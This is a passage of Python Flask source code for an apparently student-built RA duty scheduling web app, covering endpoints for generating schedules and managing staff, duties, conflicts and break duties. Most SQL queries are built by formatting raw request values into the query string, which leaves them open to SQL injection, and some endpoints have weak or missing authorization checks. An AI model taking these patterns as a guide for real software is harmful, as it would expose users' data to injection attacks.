# request.args and can either be a string of comma separated integers
# ("1,2,3,4") or an empty string ("").
# -- Check authorization --
userDict = getAuth() # Get the user's info from our database
if userDict["auth_level"] < 2: # If the user is not at least an AHD
logging.info("User Not Authorized - RA: {}".format(userDict["ra_id"]))
return jsonify(stdRet(-1,"NOT AUTHORIZED"))
logging.debug("Request.json: {}".format(request.json))
# -- Begin parsing provided parameters --
fromServer = True
if monthNum == None and year == None and hallId == None: # Effectively: If API was called from the client and not from the server
monthNum = int(request.json["monthNum"])
year = int(request.json["year"])
userDict = getAuth() # Get the user's info from our database
hallId = userDict["hall_id"]
fromServer = False
logging.debug("Run Scheduler - From Server: {}".format(fromServer))
res = {}
try:
if request.json["noDuty"] != "":
noDutyList = [int(d) for d in request.json["noDuty"].split(",")]
else:
noDutyList = []
if request.json["eligibleRAs"] != "":
eligibleRAs = [int(i) for i in request.json["eligibleRAs"]]
eligibleRAStr = "AND ra.id IN ({});".format(str(eligibleRAs)[1:-1])
else:
eligibleRAStr = ";"
except: # If error, send back an error message
return jsonify(stdRet(-1,"Error parsing No Duty Days and Eligible RAs"))
hallId = userDict["hall_id"]
cur = conn.cursor()
# -- Find the month in the Database
cur.execute("SELECT id, year FROM month WHERE num = {} AND EXTRACT(YEAR FROM year) = {}".format(monthNum,year))
monthId, date = cur.fetchone() # Get the month_id from the database
logging.debug("MonthId: {}".format(monthId))
if monthId == None: # If the database does not have the correct month
logging.warning("Unable to find month {}/{} in DB".format(monthNum,year))
return jsonify(stdRet(-1,"Unable to find month {}/{} in DB".format(monthNum,year)))
# -- Get all eligible RAs and their conflicts --
# Select all RAs in a particular hall whose auth_level is below 3 (HD)
# as well as all of their respective conflicts for a given month
queryStr = """
SELECT first_name, last_name, id, hall_id, date_started,
COALESCE(cons.array_agg, ARRAY[]::date[])
FROM ra LEFT OUTER JOIN (
SELECT ra_id, ARRAY_AGG(days.date)
FROM conflicts JOIN (
SELECT id, date
FROM day
WHERE month_id = {}
) AS days
ON (conflicts.day_id = days.id)
GROUP BY ra_id
) AS cons
ON (ra.id = cons.ra_id)
WHERE ra.hall_id = {}
AND ra.auth_level < 3 {}
""".format(monthId, hallId, eligibleRAStr)
logging.debug(queryStr)
cur.execute(queryStr) # Query the database for the appropriate RAs and their respective information
partialRAList = cur.fetchall()
# -- Get the start and end date for the school year --
start, end = getSchoolYear(date.month, date.year)
# -- Get the number of points that the RAs have --
# Calculate maxBreakDay
dateNum = calendar.monthrange(date.year, date.month)[1]
mBD = "{:04d}-{:02d}-{:02d}".format(date.year, date.month, dateNum)
ptsDict = getRAStats(userDict["hall_id"], start, end, maxBreakDay=mBD)
logging.debug("ptsDict: {}".format(ptsDict))
# -- Assemble the RA List --
ra_list = [RA(res[0],res[1],res[2],res[3],res[4],res[5],ptsDict[res[2]]["pts"]) for res in partialRAList]
# logging.debug("RA_LIST_______________________")
# for ra in ra_list:
# logging.debug("Name: {}".format(ra.getName()))
# logging.debug("ID: {}".format(ra.getId()))
# logging.debug("Hall: {}".format(ra.getHallId()))
# logging.debug("Started: {}".format(ra.getStartDate()))
# logging.debug("Hash: {}".format(hash(ra)))
#
# input()
# Set the Last Duty Assigned Tolerance based on floor dividing the number of
# RAs by 2 then adding 1. For example, with a staff of 15, the LDA Tolerance
# would be 8 days.
ldat = (len(ra_list) // 2) + 1
# Get the last ldaTolerance number of days worth of duties from the previous month
# If the current monthNum is 1
if monthNum == 1:
# Then the previous month is 12 of the previous year
startMonthStr = '{}-12'.format(year - 1)
else:
startMonthStr = '{}-{}'.format(year, "{0:02d}".format(monthNum - 1))
endMonthStr = '{}-{}'.format(year, "{0:02d}".format(monthNum))
logging.debug("StartMonthStr: {}".format(startMonthStr))
logging.debug("EndMonthStr: {}".format(endMonthStr))
logging.debug("Hall Id: {}".format(userDict["hall_id"]))
logging.debug("Year: {}".format(year))
logging.debug('MonthNum: {0:02d}'.format(monthNum))
logging.debug("LDAT: {}".format(ldat))
cur.execute("""SELECT ra.first_name, ra.last_name, ra.id, ra.hall_id,
ra.date_started, day.date - TO_DATE('{}-{}-01','YYYY-MM-DD')
FROM duties JOIN day ON (day.id=duties.day_id)
JOIN ra ON (ra.id=duties.ra_id)
WHERE duties.hall_id = {}
AND duties.sched_id IN (
SELECT DISTINCT ON (schedule.month_id) schedule.id
FROM schedule
WHERE schedule.hall_id = {}
AND schedule.month_id IN (
SELECT month.id
FROM month
WHERE month.year >= TO_DATE('{}','YYYY-MM')
AND month.year <= TO_DATE('{}','YYYY-MM')
)
ORDER BY schedule.month_id, schedule.created DESC, schedule.id DESC
)
AND day.date >= TO_DATE('{}-{}-01','YYYY-MM-DD') - {}
AND day.date <= TO_DATE('{}-{}-01','YYYY-MM-DD') - 1
ORDER BY day.date ASC;
""".format(year,'{0:02d}'.format(monthNum), userDict["hall_id"], userDict["hall_id"], \
startMonthStr, endMonthStr, year, '{0:02d}'.format(monthNum), \
ldat, year, '{0:02d}'.format(monthNum)))
prevDuties = cur.fetchall()
# Create shell RA objects that will hash to the appropriate value
prevRADuties = [ ( RA(d[0],d[1],d[2],d[3],d[4]), d[5] ) for d in prevDuties ]
logging.debug("PREVIOUS DUTIES: {}".format(prevRADuties))
# -- Query DB for list of break duties for the month. --
# In version 4.0 of the scheduler, break duties essentially are treated
# like noDutyDates and are skipped in the scheduling process. As a result,
# only the date is needed.
cur.execute("""
SELECT TO_CHAR(day.date, 'DD')
FROM break_duties JOIN day ON (break_duties.day_id = day.id)
WHERE break_duties.month_id = {}
AND break_duties.hall_id = {}
""".format(monthId, userDict["hall_id"]))
breakDuties = [ int(row[0]) for row in cur.fetchall() ]
logging.debug("Break Duties: {}".format(breakDuties))
# Attempt to run the scheduler using deep copies of the raList and noDutyList.
# This is so that if the scheduler does not resolve on the first run, we
# can modify the parameters and try again with a fresh copy of the raList
# and noDutyList.
copy_raList = cp.deepcopy(ra_list)
copy_noDutyList = cp.copy(noDutyList)
completed = False
successful = True
while not completed:
# Create the Schedule
sched = scheduler4_0.schedule(copy_raList, year, monthNum,\
noDutyDates=copy_noDutyList, ldaTolerance=ldat, \
prevDuties=prevRADuties, breakDuties=breakDuties)
if len(sched) == 0:
# If we were unable to schedule with the previous parameters,
if ldat > 1:
# And the LDATolerance is greater than 1
# then decrement the LDATolerance by 1 and try again
logging.info("DECREASE LDAT: {}".format(ldat))
ldat -= 1
copy_raList = cp.deepcopy(ra_list)
copy_noDutyList = cp.copy(noDutyList)
else:
# The LDATolerance is not greater than 1 and we were unable to schedule
completed = True
successful = False
else:
# We were able to create a schedule
completed = True
logging.debug("Schedule: {}".format(sched))
if not successful:
logging.info("Unable to Generate Schedule for Hall: {} MonthNum: {} Year: {}".format(userDict["hall_id"], monthNum, year))
return jsonify(stdRet(0,"UNABLE TO GENERATE SCHEDULE"))
# Add the schedule to the database and get its ID
cur.execute("INSERT INTO schedule (hall_id, month_id, created) VALUES ({},{},NOW()) RETURNING id;".format(hallId, monthId))
schedId = cur.fetchone()[0]
conn.commit()
logging.debug("Schedule ID: {}".format(schedId))
# Get the id of the schedule that was just created
#cur.execute("SELECT id FROM schedule WHERE hall_id = {} AND month_id = {} ORDER BY created DESC, id DESC;".format(hallId, monthId))
#schedId = cur.fetchone()[0]
# Map the day id to the date
days = {}
cur.execute("SELECT EXTRACT(DAY FROM date), id FROM day WHERE month_id = {};".format(monthId))
for res in cur.fetchall():
days[res[0]] = res[1]
# Iterate through the schedule
dutyDayStr = ""
noDutyDayStr = ""
for d in sched:
# If there are RAs assigned to this day
if d.numberOnDuty() > 0:
for r in d:
dutyDayStr += "({},{},{},{},{}),".format(hallId, r.getId(), days[d.getDate()], schedId, d.getPoints())
else:
noDutyDayStr += "({},{},{},{}),".format(hallId, days[d.getDate()], schedId, d.getPoints())
# Attempt to save the schedule to the DB
try:
# Add all of the duties that were scheduled for the month
if dutyDayStr != "":
cur.execute("""
INSERT INTO duties (hall_id, ra_id, day_id, sched_id, point_val) VALUES {};
""".format(dutyDayStr[:-1]))
# Add all of the blank duty values for days that were not scheduled
if noDutyDayStr != "":
cur.execute("""
INSERT INTO duties (hall_id, day_id, sched_id, point_val) VALUES {};
""".format(noDutyDayStr[:-1]))
except psycopg2.IntegrityError:
logging.debug("ROLLBACK")
conn.rollback()
conn.commit()
cur.close()
logging.info("Successfully Generated Schedule: {}".format(schedId))
if fromServer:
return stdRet(1,"successful")
else:
return jsonify(stdRet(1,"successful"))
@app.route("/api/changeStaffInfo", methods=["POST"])
@login_required
def changeStaffInfo():
userDict = getAuth() # Get the user's info from our database
hallId = userDict["hall_id"]
if userDict["auth_level"] < 3: # If the user is not at least an AHD
logging.info("User Not Authorized - RA: {}".format(userDict["ra_id"]))
return jsonify(stdRet(-1,"NOT AUTHORIZED"))
data = request.json
cur = conn.cursor()
cur.execute("""UPDATE ra
SET first_name = '{}', last_name = '{}',
date_started = TO_DATE('{}', 'YYYY-MM-DD'),
color = '{}', email = '{}', auth_level = {}
WHERE id = {};
""".format(data["fName"],data["lName"], \
data["startDate"],data["color"], \
data["email"],data["authLevel"], \
data["raID"]))
conn.commit()
cur.close()
return jsonify(stdRet(1,"successful"))
@app.route("/api/removeStaffer", methods=["POST"])
@login_required
def removeStaffer():
userDict = getAuth()
if userDict["auth_level"] < 3: # If the user is not at least an AHD
logging.info("User Not Authorized - RA: {}".format(userDict["ra_id"]))
return jsonify(stdRet(-1,"NOT AUTHORIZED"))
raID = request.json
checkCur = conn.cursor()
checkCur.execute("SELECT hall_id FROM ra WHERE id = {};".format(raID))
if userDict["hall_id"] != checkCur.fetchone()[0]:
return jsonify("NOT AUTHORIZED")
checkCur.close()
cur = conn.cursor()
cur.execute("UPDATE ra SET hall_id = 0 WHERE id = {};".format(raID))
conn.commit()
cur.close()
return jsonify(raID)
@app.route("/api/addStaffer", methods=["POST"])
@login_required
def addStaffer():
userDict = getAuth()
if userDict["auth_level"] < 3: # If the user is not at least an AHD
logging.info("User Not Authorized - RA: {}".format(userDict["ra_id"]))
return jsonify(stdRet(-1,"NOT AUTHORIZED"))
data = request.json
checkCur = conn.cursor()
checkCur.execute("SELECT * FROM ra WHERE email = '{}';".format(data["email"]))
checkRes = checkCur.fetchone()
if checkRes is not None:
cur = conn.cursor()
cur.execute("UPDATE ra SET hall_id = {} WHERE email = '{}';".format(userDict["hall_id"], data["email"]))
conn.commit()
cur.execute("SELECT * FROM ra WHERE email = '{}';".format(data["email"]))
ret = cur.fetchone()
cur.close()
return jsonify(ret)
cur = conn.cursor()
cur.execute("""
INSERT INTO ra (first_name,last_name,hall_id,date_started,color,email,auth_level)
VALUES ('{}','{}',{},NOW(),'{}','{}','{}')
RETURNING id;
""".format(data["fName"],data["lName"],userDict["hall_id"],data["color"], \
data["email"],data["authLevel"]))
conn.commit()
newId = cur.fetchone()[0]
cur.execute("""SELECT ra.id, first_name, last_name, email, date_started, res_hall.name, color, auth_level
FROM ra JOIN res_hall ON (ra.hall_id = res_hall.id)
WHERE ra.id = {};""".format(newId))
raData = cur.fetchone()
cur.close()
return jsonify(raData)
@app.route("/api/changeRAonDuty", methods=["POST"])
@login_required
def changeRAforDutyDay():
userDict = getAuth()
if userDict["auth_level"] < 2: # If the user is not at least an AHD
logging.info("User Not Authorized - RA: {}".format(userDict["ra_id"]))
return jsonify(stdRet(-1,"NOT AUTHORIZED"))
data = request.json
logging.debug("New RA id: {}".format(data["newId"]))
logging.debug("Old RA Name: {}".format(data["oldName"]))
logging.debug("HallID: {}".format(userDict["hall_id"]))
# Expected as x/x/xxxx
logging.debug("DateStr: {}".format(data["dateStr"]))
fName, lName = data["oldName"].split()
cur = conn.cursor()
# Find New RA
cur.execute("SELECT id, first_name, last_name, color FROM ra WHERE id = {} AND hall_id = {};".format(data["newId"],userDict["hall_id"]))
raParams = cur.fetchone()
# Find Old RA
cur.execute("SELECT id FROM ra WHERE first_name LIKE '{}' AND last_name LIKE '{}' AND hall_id = {}".format(fName, lName, userDict["hall_id"]))
oldRA = cur.fetchone()
cur.execute("SELECT id, month_id FROM day WHERE date = TO_DATE('{}', 'MM/DD/YYYY');".format(data["dateStr"]))
dayID, monthId = cur.fetchone()
cur.execute("SELECT id FROM schedule WHERE hall_id = {} AND month_id = {} ORDER BY created DESC, id DESC;".format(userDict["hall_id"],monthId))
schedId = cur.fetchone()
if raParams is not None and dayID is not None and schedId is not None and oldRA is not None:
cur.execute("""UPDATE duties
SET ra_id = {}
WHERE hall_id = {}
AND day_id = {}
AND sched_id = {}
AND ra_id = {}
""".format(raParams[0],userDict["hall_id"],dayID,schedId[0],oldRA[0]))
conn.commit()
cur.close()
ret = stdRet(1,"successful")
# ret["pointDict"] = getRAStats(userDict["hall_id"], start, end)
return jsonify(ret)
else:
# Something is not in the DB
cur.close()
return jsonify(stdRet(0,"Unable to find parameters in DB"))
@app.route("/api/addNewDuty", methods=["POST"])
@login_required
def addNewDuty():
userDict = getAuth()
if userDict["auth_level"] < 2: # If the user is not at least an AHD
logging.info("User Not Authorized - RA: {}".format(userDict["ra_id"]))
return jsonify(stdRet(-1,"NOT AUTHORIZED"))
data = request.json
logging.debug("New RA id: {}".format(data["id"]))
logging.debug("HallID: {}".format(userDict["hall_id"]))
# Expected as x-x-xxxx
logging.debug("DateStr: {}".format(data["dateStr"]))
cur = conn.cursor()
cur.execute("SELECT id FROM ra WHERE id = {} AND hall_id = {};".format(data["id"],userDict["hall_id"]))
raId = cur.fetchone()
if raId is None:
ret = stdRet(-1,"Unable to find RA {} in database".format(data["id"]))
cur.execute("SELECT id, month_id FROM day WHERE date = TO_DATE('{}', 'YYYY-MM-DD');".format(data["dateStr"]))
dayID, monthId = cur.fetchone()
if dayID is None:
cur.close()
logging.warning("Unable to find day {} in database".format(data["dateStr"]))
return stdRet(-1,"Unable to find day {} in database".format(data["dateStr"]))
if monthId is None:
cur.close()
logging.warning("Unable to find month for {} in database".format(data["dateStr"]))
return stdRet(-1,"Unable to find month for {} in database".format(data["dateStr"]))
cur.execute("SELECT id FROM schedule WHERE hall_id = {} AND month_id = {} ORDER BY created DESC, id DESC;".format(userDict["hall_id"],monthId))
schedId = cur.fetchone()
cur.execute("""INSERT INTO duties (hall_id, ra_id, day_id, sched_id, point_val)
VALUES ({}, {}, {}, {}, {});""".format(userDict["hall_id"], raId[0], dayID, schedId[0], data["pts"]))
conn.commit()
cur.close()
logging.debug("Successfully added new duty")
return jsonify(stdRet(1,"successful"))
@app.route("/api/deleteDuty", methods=["POST"])
@login_required
def daleteDuty():
userDict = getAuth()
if userDict["auth_level"] < 2: # If the user is not at least an AHD
logging.info("User Not Authorized - RA: {}".format(userDict["ra_id"]))
return jsonify(stdRet(-1,"NOT AUTHORIZED"))
data = request.json
logging.debug("Deleted Duty RA Name: {}".format(data["raName"]))
logging.debug("HallID: {}".format(userDict["hall_id"]))
# Expected as x-x-xxxx
logging.debug("DateStr: {}".format(data["dateStr"]))
fName, lName = data["raName"].split()
cur = conn.cursor()
cur.execute("SELECT id FROM ra WHERE first_name LIKE '{}' AND last_name LIKE '{}' AND hall_id = {};".format(fName,lName,userDict["hall_id"]))
raId = cur.fetchone()
cur.execute("SELECT id, month_id FROM day WHERE date = TO_DATE('{}', 'MM/DD/YYYY');".format(data["dateStr"]))
dayID, monthId = cur.fetchone()
cur.execute("SELECT id FROM schedule WHERE hall_id = {} AND month_id = {} ORDER BY created DESC, id DESC;".format(userDict["hall_id"],monthId))
schedId = cur.fetchone()
if raId is not None and dayID is not None and schedId is not None:
cur.execute("""DELETE FROM duties
WHERE ra_id = {}
AND hall_id = {}
AND day_id = {}
AND sched_id = {}""".format(raId[0], userDict["hall_id"], dayID, schedId[0]))
conn.commit()
cur.close()
logging.info("Successfully deleted duty")
return jsonify(stdRet(1,"successful"))
else:
cur.close()
logging.info("Unable to locate duty to delete")
return jsonify({"status":0,"error":"Unable to find parameters in DB"})
@app.route("/api/importStaff", methods=["POST"])
@login_required
def importStaff():
userDict = getAuth()
if userDict["auth_level"] < 3: # If the user is not at least an AHD
logging.info("User Not Authorized - RA: {}".format(userDict["ra_id"]))
return jsonify(stdRet(-1,"NOT AUTHORIZED"))
logging.info("Import File: {}".format(request.files))
if 'file' not in request.files:
logging.info("No file part found")
return jsonify(stdRet(0,"No File Part"))
file = request.files['file']
# if user does not select file, browser also
# submit an empty part without filename
if file.filename == '':
logging.info("No File Selected")
return jsonify(stdRet(0,"No File Selected"))
if file and fileAllowed(file.filename):
dataStr = file.read().decode("utf-8")
# Iterate through the rows of the dataStr
# The expected format for the csv contains
# a header row and is as follows:
# First Name, Last Name, Email, Date Started (MM/DD/YYYY), Color, Role
# Example:
# FName, LName-Hyphen, <EMAIL>, 05/28/2020, #OD1E76, RA
logging.debug(dataStr)
cur = conn.cursor()
for row in dataStr.split("\n")[1:]:
if row != "":
pl = [ part.strip() for part in row.split(",") ]
logging.debug("PL: {}".format(pl))
# Do some validation checking
pl, valid, reasons = validateUpload(pl)
if not valid:
ret = stdRet("0","Invalid Formatting")
ret["except"] = reasons
logging.info("Invalid Formatting")
return jsonify(ret)
if pl[-1] == "HD" and userDict["auth_level"] >= 3:
auth = 3
elif pl[-1] == "AHD":
auth = 2
else:
auth = 1
logging.debug(auth)
try:
cur.execute("""
INSERT INTO ra (first_name,last_name,hall_id,date_started,color,email,auth_level)
VALUES ('{}','{}',{},TO_DATE('{}','MM/DD/YYYY'),'{}','{}',{});
""".format(pl[0],pl[1],userDict["hall_id"],pl[3],pl[4],pl[2],auth))
conn.commit()
except psycopg2.IntegrityError: # If the conflict entry already exists
logging.debug("Duplicate RA: {}, rolling back DB changes".format(pl))
conn.rollback() # Rollback last commit so that Internal Error doesn't occur
cur.close()
cur = conn.cursor()
cur.close()
return redirect(url_for(".manStaff"))
else:
logging.info("Unable to Import Staff")
return redirect(url_for(".err",msg="Unable to Import Staff"))
@app.route("/api/getConflicts", methods=["GET"])
@login_required
def getConflicts(monthNum=None,raID=None,year=None,hallId=None):
# API Hook that will get the requested conflicts for a given user and month.
# The month will be given via request.args as 'monthNum' and 'year'.
fromServer = True
if monthNum is None and year is None and hallId is None and raID is None: # Effectively: If API was called from the client and not from the server
monthNum = int(request.args.get("monthNum"))
year = int(request.args.get("year"))
userDict = getAuth() # Get the user's info from our database
hallID = userDict["hall_id"]
raID = userDict["ra_id"]
fromServer = False
logging.debug("Get Conflicts - From Server: {}".format(fromServer))
logging.debug("MonthNum: {}, Year: {}, HallID: {}, raID: {}".format(monthNum, year, hallID, raID))
cur = conn.cursor()
cur.execute("SELECT id FROM month WHERE num = {} AND EXTRACT(YEAR FROM year) = {}".format(monthNum, year))
monthID = cur.fetchone()
if monthID is None:
logging.warning("No month found with Num = {}".format(monthNum))
return jsonify(stdRet(-1,"No month found with Num = {}".format(monthNum)))
else:
monthID = monthID[0]
cur.execute("""SELECT TO_CHAR(day.date, 'YYYY-MM-DD')
FROM conflicts JOIN day ON (conflicts.day_id = day.id)
WHERE conflicts.ra_id = {}
AND day.month_id = {}""".format(raID, monthID, hallID))
ret = [ d[0] for d in cur.fetchall() ]
if fromServer:
return ret
else:
return jsonify({"conflicts":ret})
@app.route("/api/getRAConflicts", methods=["GET"])
@login_required
def getRAConflicts():
userDict = getAuth()
if userDict["auth_level"] < 2: # If the user is not at least an AHD
logging.info("User Not Authorized - RA: {}".format(userDict["ra_id"]))
return jsonify(stdRet(-1,"NOT AUTHORIZED"))
hallId = userDict["hall_id"]
raId = request.args.get("raID")
monthNum = request.args.get("monthNum")
year = request.args.get("year")
logging.debug("HallId: {}".format(hallId))
logging.debug("RaId: {}".format(raId))
logging.debug("MonthNum: {}".format(monthNum))
logging.debug("Year: {}".format(year))
logging.debug("RaId == -1? {}".format(int(raId) != -1))
if int(raId) != -1:
addStr = "AND conflicts.ra_id = {};".format(raId)
else:
addStr = ""
logging.debug(addStr)
cur = conn.cursor()
cur.execute("SELECT id FROM month WHERE num = {} AND EXTRACT(YEAR FROM year) = {}".format(monthNum, year))
monthID = cur.fetchone()
if monthID is None:
logging.info("No month found with Num = {}".format(monthNum))
return jsonify(stdRet(-1,"No month found with Num = {}".format(monthNum)))
else:
monthID = monthID[0]
cur.execute("""SELECT conflicts.id, ra.first_name, ra.last_name, TO_CHAR(day.date, 'YYYY-MM-DD'), ra.color
FROM conflicts JOIN day ON (conflicts.day_id = day.id)
JOIN ra ON (ra.id = conflicts.ra_id)
WHERE day.month_id = {}
AND ra.hall_id = {}
{};""".format(monthID, hallId, addStr))
conDates = cur.fetchall()
logging.debug("ConDates: {}".format(conDates))
res = []
for d in conDates:
res.append({
"id": d[0],
"title": d[1] + " " + d[2],
"start": d[3],
"color": d[4]
})
return jsonify(res)
@app.route("/api/getStaffConflicts", methods=["GET"])
@login_required
def getRACons(hallId=None,startDateStr=None,endDateStr=None):
# API Hook that will get the conflicts for a given month and hall.
# The month will be given via request.args as 'start' and 'end'.
# The server will then query the database for the appropriate conflicts.
fromServer = True
if hallId is None and startDateStr is None and endDateStr is None:
userDict = getAuth() # Get the user's info from our database
hallId = userDict["hall_id"]
startDateStr = request.args.get("start").split("T")[0] # No need for the timezone in our current application
endDateStr = request.args.get("end").split("T")[0] # No need for the timezone in our current application
fromServer = False
logging.debug("Get Staff Conflicts - From Server: {}".format(fromServer))
res = []
cur = conn.cursor()
cur.execute("""
SELECT ra.id, ra.first_name, ra.last_name, ra.color, TO_CHAR(day.date, 'YYYY-MM-DD')
FROM conflicts JOIN day ON (conflicts.day_id = day.id)
JOIN ra ON (conflicts.ra_id = ra.id)
WHERE day.date >= TO_DATE('{}', 'YYYY-MM-DD')
AND day.date <= TO_DATE('{}', 'YYYY-MM-DD')
AND ra.hall_ID = {};
""".format(startDateStr, endDateStr, hallId))
rawRes = cur.fetchall()
for row in rawRes:
res.append({
"id": row[0],
"title": row[1] + " " + row[2],
"start": row[4],
"color": row[3]
})
if fromServer:
return rawRes
else:
return jsonify(res)
@app.route("/api/getConflictNums", methods=["GET"])
@login_required
def getNumberConflicts(hallId=None,monthNum=None,year=None):
fromServer = True
if hallId is None and monthNum is None and year is None:
userDict = getAuth() # Get the user's info from our database
hallId = userDict["hall_id"]
monthNum = request.args.get("monthNum")
year = request.args.get("year")
fromServer = False
if userDict["auth_level"] < 2: # If the user is not at least an AHD
logging.info("User Not Authorized - RA: {}".format(userDict["ra_id"]))
return jsonify(stdRet(-1,"NOT AUTHORIZED"))
cur = conn.cursor()
cur.execute("""
SELECT ra.id, COUNT(cons.id)
FROM ra LEFT JOIN (
SELECT conflicts.id, ra_id
FROM conflicts JOIN day ON (conflicts.day_id = day.id)
JOIN month ON (month.id = day.month_id)
WHERE month.num = {}
AND EXTRACT(YEAR FROM month.year) = {}
) AS cons ON (cons.ra_id = ra.id)
WHERE ra.hall_id = {}
GROUP BY ra.id;
""".format(monthNum, year, hallId))
res = {}
for row in cur.fetchall():
res[row[0]] = row[1]
if fromServer:
return res
else:
return jsonify(res)
@app.route("/api/getRABreakStats", methods=["GET"])
@login_required
def getRABreakStats(hallId=None,startDateStr=None,endDateStr=None):
# API Hook that will get the RA stats for a given month.
# The month will be given via request.args as 'monthNum' and 'year'.
# The server will then query the database for the appropriate statistics
# and send back a json object.
fromServer = True
if hallId is None and startDateStr is None and endDateStr is None: # Effectively: If API was called from the client and not from the server
userDict = getAuth() # Get the user's info from our database
hallId = userDict["hall_id"]
fromServer = False
startDateStr = request.args.get("start")
endDateStr = request.args.get("end")
logging.debug("Get RA Break Duty Stats - FromServer: {}".format(fromServer))
res = {}
cur = conn.cursor()
cur.execute("""SELECT ra.id, ra.first_name, ra.last_name, COALESCE(numQuery.count, 0)
FROM (SELECT ra.id AS rid, COUNT(break_duties.id) AS count
FROM break_duties JOIN day ON (day.id=break_duties.day_id)
JOIN ra ON (ra.id=break_duties.ra_id)
WHERE break_duties.hall_id = {}
AND day.date BETWEEN TO_DATE('{}', 'YYYY-MM-DD')
AND TO_DATE('{}', 'YYYY-MM-DD')
GROUP BY rid) AS numQuery
RIGHT JOIN ra ON (numQuery.rid = ra.id)
WHERE ra.hall_id = {};""".format(hallId, startDateStr, \
endDateStr, hallId))
raList = cur.fetchall()
for ra in raList:
res[ra[0]] = { "name": ra[1] + " " + ra[2], "count": ra[3] }
cur.close()
if fromServer:
# If this function call is from the server, simply return the results
return res
else:
# Otherwise, if this function call is from the client, return the
# results as a JSON response object.
return jsonify(res)
@app.route("/api/getBreakDuties", methods=["GET"])
@login_required
def getBreakDuties(hallId=None, start=None, end=None, showAllColors=False):
userDict = getAuth()
fromServer = True
if start is None and end is None and hallId is None: # Effectively: If API was called from the client and not from the server
start = request.args.get("start").split("T")[0] # No need for the timezone in our current application
end = request.args.get("end").split("T")[0] # No need for the timezone in our current application
showAllColors = request.args.get("allColors") == "true" # Should all colors be displayed or only the current user's colors
userDict = getAuth() # Get the user's info from our database
hallId = userDict["hall_id"]
fromServer = False
cur = conn.cursor()
cur.execute("""
SELECT ra.first_name, ra.last_name, ra.color, ra.id, TO_CHAR(day.date, 'YYYY-MM-DD')
FROM break_duties JOIN day ON (day.id=break_duties.day_id)
JOIN month ON (month.id=break_duties.month_id)
JOIN ra ON (ra.id=break_duties.ra_id)
WHERE break_duties.hall_id = {}
AND month.year >= TO_DATE('{}','YYYY-MM')
AND month.year <= TO_DATE('{}','YYYY-MM')
""".format(hallId,start,end))
res = []
for row in cur.fetchall():
if not(showAllColors):
# If the desired behavior is to not show all of the unique RA colors
# then check to see if the current user is the ra on the duty being
# added. If it is the ra, show their unique color, if not, show the
# same color.
if userDict["ra_id"] == row[3]:
c = row[2]
else:
c = "#2C3E50"
# If the desired behavior is to show all of the unique RA colors, then
# simply set their color.
else:
c = row[2]
res.append({
"id": row[3],
"title": row[0] + " " + row[1],
"start": row[4],
"color": c,
"extendedProps": {"dutyType":"brk"}
})
if fromServer:
return res
else:
return jsonify(res)
@app.route("/api/addBreakDuty", methods=["POST"])
def addBreakDuty():
userDict = getAuth()
data = request.json
selID = data["id"]
hallId = userDict["hall_id"]
ptVal = data["pts"]
dateStr = data["dateStr"]
if userDict["auth_level"] < 2: # If the user is not at least an AHD
logging.info("User Not Authorized - RA: {}".format(userDict["ra_id"]))
return jsonify(stdRet(-1,"NOT AUTHORIZED"))
cur = conn.cursor()
# Validate that the RA desired exists and belongs to the same hall
cur.execute("SELECT id FROM ra WHERE id = {} AND hall_id = {};".format(selID, hallId))
raId = cur.fetchone()
if raId is None:
cur.close()
logging.warning("Unable to find RA {} in hall {}".format(selID,hallId))
ret = stdRet(-1,"Unable to find RA {} in hall {}".format(selID,hallId))
else:
# Extract the id from the tuple
raId = raId[0]
# Get the month and day IDs necessary to associate a record in break_duties
cur.execute("SELECT id, month_id FROM day WHERE date = TO_DATE('{}', 'YYYY-MM-DD');".format(dateStr))
dayID, monthId = cur.fetchone()
# No Day found
if dayID is None:
cur.close()
logging.warning("Unable to find day {} in database".format(data["dateStr"]))
return stdRet(-1,"Unable to find day {} in database".format(data["dateStr"]))
# No month found
if monthId is None:
cur.close()
logging.warning("Unable to find month for {} in database".format(data["dateStr"]))
return stdRet(-1,"Unable to find month for {} in database".format(data["dateStr"]))
cur.execute("""INSERT INTO break_duties (ra_id, hall_id, month_id, day_id, point_val)
VALUES ({}, {}, {}, {}, {});""".format(raId, hallId, monthId, dayID, ptVal))
conn.commit()
cur.close()
logging.info("Successfully added new Break Duty for Hall {} and Month {}".format(hallId, monthId))
return jsonify(stdRet(1,"successful"))
@app.route("/api/deleteBreakDuty", methods=["POST"])
@login_required
def deleteBreakDuty():
userDict = getAuth()
data = request.json
fName, lName = data["raName"].split()
hallId = userDict["hall_id"]
dateStr = data["dateStr"]
if userDict["auth_level"] < 2: # If the user is not at least an AHD
logging.info("User Not Authorized - RA: {}".format(userDict["ra_id"]))
return jsonify(stdRet(-1,"NOT AUTHORIZED"))
logging.debug("Deleted Break Duty RA Name: {}".format(fName + " " + lName))
logging.debug("HallID: {}".format(hallId))
# Expected as x-x-xxxx
logging.debug("DateStr: {}".format(dateStr))
cur = conn.cursor()
cur.execute("SELECT id FROM ra WHERE first_name LIKE '{}' AND last_name LIKE '{}' AND hall_id = {};".format(fName,lName,userDict["hall_id"]))
raId = cur.fetchone()
cur.execute("SELECT id, month_id FROM day WHERE date = TO_DATE('{}', 'MM/DD/YYYY');".format(data["dateStr"]))
dayID, monthId = cur.fetchone()
if raId is not None and dayID is not None and monthId is not None:
cur.execute("""DELETE FROM break_duties
WHERE ra_id = {}
AND hall_id = {}
AND day_id = {}
AND month_id = {}""".format(raId[0], hallId, dayID, monthId))
conn.commit()
cur.close()
logging.info("Successfully deleted duty")
return jsonify(stdRet(1,"successful"))
else:
cur.close()
logging.info("Unable to locate beak duty to delete: RA {}, Date {}".format(fName + " " + lName, dateStr))
return jsonify({"status":0,"error":"Unable to find parameters in DB"})
@app.route("/api/saveHallSettings", methods=["POST"])
@login_required
def saveHallSettings():
# Save the hall settings received
userDict = getAuth()
# Ensure that the user is at least an AHD
if userDict["auth_level"] < 3:
logging.info("User Not Authorized - RA: {} attempted to overwrite Hall Settings for : {}"
.format(userDict["ra_id"], userDict["hall_id"]))
return jsonify(stdRet(-1, "NOT AUTHORIZED"))
# Get the name and value of the setting that was changed.
data = request.json
setName = data["name"]
setVal = data["value"]
logging.debug("Setting Name: {}".format(setName))
logging.debug("Setting Value: {}".format(setVal))
# Create a cursor
cur = conn.cursor()
# Figure out what setting we are attempting to change and whether
# is should be handled in a special way.
if setName == "Residence Hall Name":
# We are attempting to update the res_hall.name field in the DB
# Make sure that the user belongs to that Hall
cur.execute("""SELECT res_hall.id
FROM res_hall JOIN ra ON (ra.hall_id = res_hall.id)
WHERE ra.id = %s;""", (userDict["ra_id"],))
